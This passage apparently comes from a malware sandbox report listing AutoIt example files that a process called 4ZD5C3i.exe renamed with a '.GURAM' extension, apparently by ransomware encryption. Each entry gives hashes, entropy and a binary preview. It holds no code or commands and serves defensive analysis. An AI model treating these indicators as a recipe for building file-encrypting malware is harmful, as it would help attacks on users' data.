                                                                                                                                                                                                                                                Preview:..'Y.R2M.......H....n.}_.#1f.h.?.y.bW\.S...<.$^....n...b...&,12...@fS......(t.kt_Zz.tz.h......F.-=.....v...j..c.V".Bn.4........6.[Y...&.vsSJ.^....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$........b.N.xB..D..V.....9YJ2..}n9......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorGetRGB.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):895
                                                                                                                                                                                                                                                Entropy (8bit):7.766668139489908
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2fhU7gFRepsOkZXnw0Qe+fiThFbNerDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJu9:sCKGsBnw7chYjmJrc0YXUZtwsTOCa
                                                                                                                                                                                                                                                MD5:4574245068839FEF68F1DD123D841B32
                                                                                                                                                                                                                                                SHA1:1129715C8872E4918A1934E467908DF0F2D264C5
                                                                                                                                                                                                                                                SHA-256:E6F788C750DB6B3FAAC45A9B180F478552F83E054AC10E948FFC2E248C89E180
                                                                                                                                                                                                                                                SHA-512:C17C2745F569B22BFC3D449CE8784E27269C3409E6E7AD05920EE88F570532862A6C008B9FF5348A2CD7C526BE559BF699144026CD1E47745084C42D5943503D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8@..`..p.v=..K......_....H...yw.m.g`...tq...O.b.*.>95.\J'.........Z.T{.... \m.....E.&..*+....).B..w...]...........F*..T..@....k...D..>R....x...X..nJ._.Eu.P`....."}(.H>1...Wj....l.......z<.b...W..W,..]...p.:w8\u....$../.8.@..;RB...i..dw(..C..5..j.R?....q........!.:D.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....=...e.IF.kV..lz..-.U#.Q..R".uy.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorGetRed.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):754
                                                                                                                                                                                                                                                Entropy (8bit):7.713611176485787
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UkueVFQptkL1jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZohkku:pueVQuL1jmJrc0YXUZtwsTkhc
                                                                                                                                                                                                                                                MD5:4337BA1402361A99B2EA88E203D9A53A
                                                                                                                                                                                                                                                SHA1:77CFC03ECFB77876C2B19EA8D8FF12C70D7A0E64
                                                                                                                                                                                                                                                SHA-256:BC9A7A2359DAF303A93B38D87B1DBCD04C9CB4318C6D4947AF202CFE6E4FE8F9
                                                                                                                                                                                                                                                SHA-512:D00153169CFD9DC4C8AA4F959F89FE6549A48D4645E297EBFB40AA8728F28A8E1D8DD6F49FB14F0D3524AC5E0DDE48E6CB44655B3CB4BC437AC24AFC2A48101D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..~"X.Wz.H....Ao...~.../.].u.#...uX..l....|Y..h5:..".....s]5.$.X.r......Q..b....'....`...Uz.fc.........`aH....[x..L3.....%......1.....(.F...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..5...K..]@..S.rHGKk...<.zS.u..J.W.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\pragma.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1789
                                                                                                                                                                                                                                                Entropy (8bit):7.879803450245918
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:0bGQfqRwKaOasZOzB7b4av+iuRzNFKqX457u0ZmRyZux7zX5jmJrc0YXUZtwsTF+:KHuraOqF4avORmo0q0ZmdB4o0jZtw8+
                                                                                                                                                                                                                                                MD5:D6F3D74CA381CE31AB9D35BAF2D2827B
                                                                                                                                                                                                                                                SHA1:D1BB4E191B4D81A92201F6AA4603E9E9DCA9586D
                                                                                                                                                                                                                                                SHA-256:4FCB0A9896F0EA0391743551CF0642F5B27E8B768A658154B0F59C5A4DB06337
                                                                                                                                                                                                                                                SHA-512:69B3CA73C1DA1F7335DEA5FF923F8555A85F1DBD90F00A504EA9A5971CF96EC3AF5F4AB460879C007806439C947A5F1AC8D43081E95CF1AA7E077823DF0A3267
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..#..,v.e.Z...z.qU....>.E.da.w.......L..[e.OK.......z.a......-...(.A.p.;#.TT..(<..Ix.q.....;i..;...j6.w+..5..*....7.u.V|lG.'@..5]^T.....Ap.._..O..I......Y..MX:......W..g..<..1(......\.&.>.I.zD....7...H....~..T=FD....D.....6......;Q.A.?9`...IQX..Me.....%.J-.[...1.&D.b.x....=........A.$.1.\/..T..nX........~<....z.. .6O.A3......0ah.....p...o..k...m<.E{9.],p.Q..A.[...A.f..X.z<..c),..a+.^.... ..x..c.'.!..X.^.0..A..p.<u..#...n.......$.....1...J..r.....-...D}37...V....s..Y[{ST....m.A....Kf.......b&.U.=... fp.L...{j.]Y.Q.j..]>%l.X.>..pj.Gu.'..?....09....Q...#.y=..x{zK....H.c.~....h..H.e.w..A.}.V....Kw5....D....L...#..>p..yU....o.\....w..<..i\...VQ.A.....K../....bS..........HW....4.ar.1.0...D.H.7..U.5".}.U<..I........VC...>.0....A.2.i%...=............._]..J....9.Z..M.P.*x..T...dru..."..\.Qw\1%.k7.o._..'.Nns.<...hAm....I..+.....^.Q~<..\."......?x....MnTj.o.p.M..8...;...J..B.,...%..=d.[w...v....n.77......._..e.Be.#`.^?OQ......C.D....."`...Q.O5

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\pragma[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.696655618380409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:MFrDQvXyg4LMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ+3I6n/c:AQ/F4YjmJrc0YXUZtwsTi3I6/c
                                                                                                                                                                                                                                                MD5:08FA606139122268BD7AB24F6D66BDB7
                                                                                                                                                                                                                                                SHA1:E18E76E40747D5DE0C69077ED1A33DAC178FAFBB
                                                                                                                                                                                                                                                SHA-256:5097905FD1E2F3239C7D8A47FC4DC11A0D54ECC8ADCFB855A9E16987E8597B9A
                                                                                                                                                                                                                                                SHA-512:54D32E4F477CDD8F3C4AE1B67B153D3A20EFA71B9A089652F26CB6E381912987DF2B88FA40B3761885CC27D9530F5904356B720197E3F4BCD964D6990545B562
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..sr..H....J.......>.0..9cL.e.g.Q.....fD=.XXGO...i....Z.2n..K...W....S.o~....O...54...wq./c......Gy...J.u.a.a..M.g."..k<`.5.Tz.M......R... .Vb..\.b..kBM~cW.V...L.c.ZqJ...N...=.e.mF.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...sQfd._N...fn..x.Eec...c.k.3.D......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\pragma[3].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1427
                                                                                                                                                                                                                                                Entropy (8bit):7.868484325114691
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ufqORaQesKYZPyxrU6V2vkQ7inSfaBTjABoo+cr/NjmJrc0YXUZtwsTW:EqO9XPorU6V2vkfaaCnV4o0jZtwh
                                                                                                                                                                                                                                                MD5:26C54084B08092A3AFECBD12CE5B7938
                                                                                                                                                                                                                                                SHA1:EB0658F978EEED6DC719AB2BDE21044085307B7D
                                                                                                                                                                                                                                                SHA-256:9DD17B51E829163F03368D2D260D369A58AAF8D66C93E1FF2C4ED73179DD9905
                                                                                                                                                                                                                                                SHA-512:8252FB3BB3DE59C17C0D8ECC5C1E488769B16D6D8510465C0EE5E4D38E5A5F756ECAEAD076E76C5120C17097E2D5DFE517DE120072F8BE2530BC7A4C89A9CD18
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..YI.//DU;..L.h..w..1.j.e/._K ...f.s.j.-.v....J.,Kt..1.E.h..BR..Q^....i..n...U...}R.....t..t..i..<.h.7.....p.....ym.R....L.Y;.m......B....~j...W1.K...nF.)f..7R..1.....g...@..nx%..}N.yU8...0.Y#..:)V....`..._..........0..=...U..s...O...A.e|].M....i.4.M...."X7%.V."...e..~..<...>.QMV...l.bX|(*nX4>.Y....r....z._..|.S...PdP!K.B....!U.H..@...m.0.<.<W._:..Yr>\.....G.%....M.....Xd.;....9..&../<.+....q[..ua.[r>...=....).T....Uy.$.Y!.Mx!.&.W.......q...n'......W.,.0...!.<S.'...8.t..U..YGL..-x`F*%>\..Lj.;....<q...6sx..PL0G...D..>.}$5<.u.|..n..WC....On..U..B>0..=]Ai!..kU@lg.....a..m.V......y...@..e......I.......9+V%....V.i,Aq^ ?...<.d4... ....vQ...G.&....SlLo.`.h.0x.O .j.M...k..g.......^.IH.F..v...v .[/.....=.N......._2c.........$D3...a..=lR..b..%..w.)+..........,.(.'H.N...oV.3...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\_ReadMe_.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):815
                                                                                                                                                                                                                                                Entropy (8bit):7.7247436208273115
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9I9wP6DIoqrTUBr4ZVS+p2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOJ:qKCBaS+p2jmJrc0YXUZtwsTYE
                                                                                                                                                                                                                                                MD5:10EDC520225AE00D964296E5620D4A9B
                                                                                                                                                                                                                                                SHA1:143E85C8E99CA21752D81788BD1B8249DD54A626
                                                                                                                                                                                                                                                SHA-256:E7F47E36F04D9CDB5C84E7F5CEF3E8D370333DA205B3B193B401DB5DDE517E6D
                                                                                                                                                                                                                                                SHA-512:338DEB52347CDFE76FF50C4CE7F1C6FA9E8CF8E868B89717BDB26CC215E77C62D125D0CB859B5622C25F00679474597E335A27165DF94824265C77486D6D53C8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.g...24.....`.C.CXE....X.....l.8.Yu.. .K.,...l..G..I^IVlp...m.1V.yO....6.^.....$....j.....t..zG..YQ"....2c'..%..L......M...!..v.'.".1#.:..%.v?.#..."...<.....>Y.4.*H.P..T=....Y..w..#..nwe..v...V.Q...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..rOMv..z....n|.. .G.h...@U..#?.@b.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\calculator.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2475
                                                                                                                                                                                                                                                Entropy (8bit):7.9091261992880515
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:X7exdNRFqMkUPUTYWUu+ePOoh3/BIx584o0jZtwtU:XYYMkWwv7POoR03letU
                                                                                                                                                                                                                                                MD5:66C12533CE38C44941B6D4FE30F047A1
                                                                                                                                                                                                                                                SHA1:3427850EBE88CFA65526610E623023B4616BA201
                                                                                                                                                                                                                                                SHA-256:78BEDC724E1FB431D1932A164869E881447389651DAE645CA338C87B92F4C248
                                                                                                                                                                                                                                                SHA-512:86A5662BCE928E62A8E1BEADCD33A7C761BC5F6D9D8D05AF6EA6A14A853C717E31681EDB1AE3AB36D77B44525073165D21B9C1A2140BDDF6D34E17D191E7611D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:9w.....k7.n8......p.)...GC...-......`.%....B..q.5..4a...M..;K%Z...;.J.........d.....hdS..u.2..#..{m.{.o....|...C3..D.{G..o.L.J...%Z.d.N....._...(.i/0.%.....8..V..3..Z|..(.j.g...O.."....9.`.@..A.kg.+U.o.KP../.......n..[rO.*...&.i~;..~...t.....5^.WA.*..j*.}.d......uNq..v.$....2.0... _..|...N.sr..=....r.?.Y.rc...:....[.#...Jb..%\^...~U.k.w.5..%..#...I...=....Q!P..#.1(J.)..u...b..@).T6uE.?.z..A..::tJR.~?....&_.L...D.O.my. ...@.?...u?zm..Y..l{.g].e\ .I%.w.._.h.a...>.E...z[.6...lG<l.;...?Z...I..u..8./.T..z.......[.o.......Z..C.PJ}..rW@.op...>c.#........%'...Z.........M.++D..........G..f..f.n.>v...C.N*....1..Yp.8K..D..Z9.....n..N.;T..E.l..MJ...Q.~.#..K..o.$V.A.\..#.!W..0..$C.+.2.+.....Wa..{..#.a*....l..,.m........S....B........=.C.-Xc..,..uJ...E..`..2..........+.[...!o<...^...m....zY6.>\i..-..*"i.>.<.&b j.Z?^.JN..S.K..6.+B.^.G@......x.....\.*.1~.J.,...C>p<3....;.....^...C.6........*.m..6SKlgZa.,5..6.M.2.S..s;2.A.6.]VM.......2........Z

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\count-do.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1911
                                                                                                                                                                                                                                                Entropy (8bit):7.890511398103584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:86Ko06UcisQkklR1G7UOAD4UL70L/YIDVODRNLjOvGIyOzscajmJrc0YXUZtwsTi:8m9JklRgwaK7yI1NmXyCk4o0jZtwZApc
                                                                                                                                                                                                                                                MD5:25B03C8169697CEEAF9B836061BB4564
                                                                                                                                                                                                                                                SHA1:245BD1988DDCDF59094EA08E1260D4311F915C64
                                                                                                                                                                                                                                                SHA-256:EE9D49E0A4D2CA45988C6FC644A9D9BCDEB6272C94D2599595D66C6253538C21
                                                                                                                                                                                                                                                SHA-512:A0B8104FCDA2EC1FF1194B92018149F58CF9129C398CC8D2AA9E07016E9450A906AB30EB479C903402FA7C82BE2117011AC6949221CDFBAE9D14A5898F214CEB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.J..&.w0.I.....=.G$x.....u...P....?..kZ.:.....<.e...'..0'..9./...-.z..A...<.-.9._.c.xx.J.G.5..5/a1.O...2..jD&.........d6......1O...#...K.......:..C.o...t.......u.7)R...B.j..m..h60./S..3k..= .Q...4,.(4m2.v.[........,}...@.j..O./.....v..e....f..V.....QH.j...O_]P^G...[...#..........}Z.g.+]...mv..{...u..dt..tJ.].:3E.t.Y%.Y.P...E8.ov....{ ...W.kw...M...R.=>.^y.?..O.:....u.....(r.. ..L.q.s..1c.......q.%........./.N..Ko.|./fTR..).=.tk~.].[..E.JU.Ij.q...IW.s..#q.Si.E.5.N..l/)....A....wt..3G.g.r.W+......q..1..zEd..x.....}.....^..z..Ds..%.VA..wA%y....(b-F...+..b......T.N.....i.R.v..?..'..Y.......*.e.{.W..r..Ql..4....'8g..~..(~..u...._.T^.....g.0.....AM.$..[...5>..`C-q.$..!|..8m.k.g.....xM.<.!..@....S....2#..2...e.J..].....x.>..U.;`$...C.T..@`T.t8.h.f.I.M.H..aH1V.&..).#.N..VVR[...[V..?&{....;.....f.....?EK.......Os..0...x..Pf.r.....(.&.P.^.8.l7......S......R....|...(.k...88.eB.......=.8ku.Ud.-...S.@.8.X.....8L...H.mh..:.j\|..NH!._.......

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\count-for.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1694
                                                                                                                                                                                                                                                Entropy (8bit):7.89186838733798
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:hk3HsVT2Zf5sENl3Brzx6+v0wZ8I4o0jZtwBb:hvkZ+ENlHT8ZleBb
                                                                                                                                                                                                                                                MD5:C669FA9E8B2CDBA1D44FC5A2F28643B1
                                                                                                                                                                                                                                                SHA1:69ECC8FE5962D841A7DC6FE7322D7E1EE3DF99EB
                                                                                                                                                                                                                                                SHA-256:C56557723A9A38CD16EA0C2584A1E43282F750119B582F53D9A4C945370DD335
                                                                                                                                                                                                                                                SHA-512:FB3D6AA76B521D821AC9FF712DB6408BFDA976AB366B0EA969515BDB272A24BF9E93D459263E4E2174C84FFE70AC39200CDCF8C29D6F63D2E269B9FB106FAD47
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.!..$q(V~....z{.P.'.O..4M(.uZ...........5{q'ly...hl....w....Z..$<=....k....Ya..9ew..B..%........,^%....5X..Q.^-.w.1?..o.*..H...1.on..-L...M..mDo..~Uf.......a....A..Y.J...3.\^)......2.%.:......([(..1x..-g.e.../Nd.....T...%......p..?......F.D.u...`/U=;.wJ.|x.k..T...3.Jn...Amu.Q.....y._.:{.i....X.`>.....-.xn^..4..>.+{.....$...".dy....xo....w.BM.0.....4QJ.)....A,|p#.;...._..o}..0.Gt.......bU..^.I.$Y.]8..qr.L.Z*m.C.jc..v.l.IK...Z.c.h.l.+...n...".Rlq...a[..{P...z3.*....5......#0R_2.%@e.r..'+......@.X....qb.....I8.+....D....k...]*.kC..!.......H..bC...].|...;..H.....u2}.!`.Psd;.0.5.............^i.u...J....R.o.x.....l.G.i^3..D|..kJ..BK)eN...S.*..r-...!3.s..-....L1.z.%)s...i{.>.+..z.r.R.P...*\F....I6...........Niv..$.`..L.O......i<..... ..Q.;'...z......>.....)......#.z.....uj...N...@....z..nV.G...JH.d.C'..\..L..v.?8.7....d:.p.....!.q.Q...37...a...@i.y...k/...<i.{....._.a..~..= mm..g..............QCaNg...../......N..Crp.........|...Jo...~(.....[..-...P.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\count-while.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1903
                                                                                                                                                                                                                                                Entropy (8bit):7.88919996565879
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ubksafrWEYWpvzoHmC1lCM27DShJG4o0jZtwnaHwc:gkrWEvzoGC1oSblenaQc
                                                                                                                                                                                                                                                MD5:9527157ED4EDB36AFB8E1F7A6DD67303
                                                                                                                                                                                                                                                SHA1:E49B265E1C74F00BEFAD21A9871C580C299027C2
                                                                                                                                                                                                                                                SHA-256:EDC79ED4E40E271720FD297848EC3EEDCB066A48AE13D9FF22E18A888BFA7C7C
                                                                                                                                                                                                                                                SHA-512:4DB0623A5E7F34DCF74B14939C3C90987C683593C3765DEA6C364D6FFECD9D6330B2CF187E9078C1D26371A3B41B13C0D8DF380B5E042FE95D9FB56BD6439AC1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ru/..`S...(.m.9...;..BH(5..I+\....p^...7.F..0w!.....#..T......I....(.-...8...r.;8.y.Y.k....z@..D.......x>..k..~.{.EM....!U(.....l...#/..U.Q7:!...Z..'F....?d.%....w.).....>r.9.......`%.N:.+0.........Y./,...q.p.G4d~..yr.]..r.8Y...(.mm:H.#.....?....u..'&.N6C..E".^.........G..3&..($..|...@=.z.....s...t..Y}`.L...O..5....(F.)...C..R.&#........G\.....]nl.plVm.-H,.>..N..k.x.....P.M.ao..fR$.]5.h......)y..3...A....B.AE.o.mz.:]*..).1.8.k.u...I..f.&......_.W.ZUz."..P07on..[..M.v..f.......|.9.;E..'.-k.....5..t...e8.T...-.....\...."9.s.... ...k.?.a.._~.......U.%.@...[.:.BN.i_`X.......s.h:;..)o...m.....!.~.8S.F...c..]h.'......(B...........&..'.}....R...K.P...v...M...l...znB\.v5;@=.rp..n.P.....-?..m~M.$......X..%......!.*.......'.u1....r..*jK.....rj....{L.:...1.n....~'D..0G.5..i..+..cP..=.9w.[....1....3I...cM...;..>v.!.....|..r..+.p.[...k> %dF.Y.Mt .sZ.\...m{.~.O..J.r...J..e+rci..n.......|^XW[k_..\a.v..m......f.Y.....{......C..,..M..O.%-#.n.P...#Z.H...&...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\functions.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1880
                                                                                                                                                                                                                                                Entropy (8bit):7.898071007568795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:oBZif6PDTT4NKxsTlOfCGdWDBHE04o0jZtwjF:mPesfCGdoHE9lep
                                                                                                                                                                                                                                                MD5:2C221DD04FD1AF0A847D809B46D2AB2F
                                                                                                                                                                                                                                                SHA1:B37CEC7A68BB4E2982A610AD02861B286961AB14
                                                                                                                                                                                                                                                SHA-256:7E23B4C5705AF8816604B07E23ED88321624BEAA4F2AEAB0D2986C7762441F89
                                                                                                                                                                                                                                                SHA-512:0AE10B5C568EB7F3583C9223642B1A70043E596BE2BE08BB99DB8E9748225B87055C4CE8ACBD8F0D82FC408207143B8A229039FBE5EE692C8CDF0B43A906F02A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.t.T.^".q.9.Ve...@..U.......`....7C..A0...6. .S.. ..d.....Ft.%.._..;.3w...Z...V..d%>...x..M..,My.7..V ..H^].......c.Lh...E..V....h...w..@:....TF..2....O.e<......_.G|.E3B.......8.dM..MJ..c4.r..%.i..)B:<..U..$..........#.G.-..E..>b...9.H...*..]....U.`n.8.......C^V........q...Dt.v..'7c^+....&....dJn0.. .1.......A.]..._.`.!..}.x..A.. !i..6.TD...<....\..bC.; ....,.B.2..#.<..o..e.ji?.-..#.Q.....V,..i.|Z.qh6u&..M.O...<.y..L...., ..^.W}6J.,.b....|...Ut.+..:....@...n.$;..c...-Y.. n....wN..!.......1sT...&...}[.9....1..N..2.]..d...J....;l......P.....C.GzS..~...........Y..M...j6^.Y....>(.N@...r.M0.......}5d.@...4..[...*'.e.fI....-.H*..`i.@%.../........U...;..Aya.3)..o....!7N..L..S^B!.....a.....p......}...b.q3.....I...*I.t.R.WvWhq..........HT.............7.........R.eK..bA._.....e..._.\.i.Z..u=....[.../...)..~1.pB....Ts..r.../....:..y.......e.......Rh.4....j.A.'...iE......%.N..u._.T[..(..........r..;!...=.Hz...."...I..V....J...j$.l..L6.......c...(/..w.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\inputbox.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2436
